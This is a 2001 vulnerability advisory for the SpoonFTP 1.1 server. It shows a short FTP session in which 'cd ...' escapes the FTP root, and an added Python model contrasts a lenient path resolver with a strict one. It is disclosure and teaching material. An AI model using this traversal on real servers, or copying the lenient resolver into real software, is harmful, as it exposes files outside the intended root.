Reported September 20, 2001, by Joe Testa.

VERSION AFFECTED

· Pi-Soft SpoonFTP 1.1 for Windows 2000, Windows NT, Windows Me, and Windows 9x

DESCRIPTION
A directory traversal vulnerability exists in Pi-Soft SpoonFTP 1.1: an attacker can use relative paths to break out of the FTP root.

DEMONSTRATION

Joe Testa provided the following scenario as a proof of concept:

>ftp localhost
Connected to xxxxxxxx.rh.rit.edu.
220 SpoonFTP V1.1
User (xxxxxxxx.rh.rit.edu:(none)): jdog
331 Password required.
Password:
230 User logged in, proceed.
ftp> pwd
257 "/" is current directory.
ftp> cd ...
250 CWD command successful.
ftp> pwd
257 "/..." is current directory.
ftp>
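
Added example, not part of the original advisory and not Pi-Soft's code: a Python model of CWD path resolution that reproduces the 257 "/..." reply above, beside a stricter variant that refuses the component. The advisory does not describe the server's internals, so the resolver logic, the ROOT value and the function names are assumptions made for illustration.

```python
import ntpath

ROOT = r"C:\ftproot"  # assumed FTP root, constructed for this example

def resolve(cwd, arg, strict):
    """Resolve a CWD argument against the virtual cwd; '..' is clamped at '/'."""
    arg = arg.replace("\\", "/")
    parts = [] if arg.startswith("/") else [p for p in cwd.split("/") if p]
    for comp in arg.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if parts:
                parts.pop()
            continue
        # Strict mode refuses names ending in a dot or space, which covers
        # dot-only names such as '...' (policy assumed for this example).
        if strict and comp != comp.rstrip(". "):
            raise ValueError("rejected path component: %r" % comp)
        parts.append(comp)
    return "/" + "/".join(parts)

def lexically_inside_root(virtual):
    """String-level containment check on the host path built from a virtual path."""
    host = ntpath.normpath(ntpath.join(ROOT, *virtual.strip("/").split("/")))
    return host == ROOT or host.startswith(ROOT + "\\")

if __name__ == "__main__":
    # Lenient resolver: '...' is not '..', so it is kept as a directory name,
    # matching the 257 "/..." reply in the session above.
    v = resolve("/", "...", strict=False)
    # The string check also passes; how the OS treats a dot-only name is
    # outside what this check can see.
    print(v, lexically_inside_root(v))
    try:
        resolve("/", "...", strict=True)
    except ValueError as e:
        print("550", e)
```

The point of the pair is that filtering only the literal ".." component, or checking containment on the normalized string, both let "..." through to the filesystem; rejecting the component before the path is built does not.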

 

VENDOR RESPONSE

The vendor, Pi-Soft Consulting, has released version 1.1.0.1 to fix this vulnerability.

CREDIT
Discovered by Joe Testa.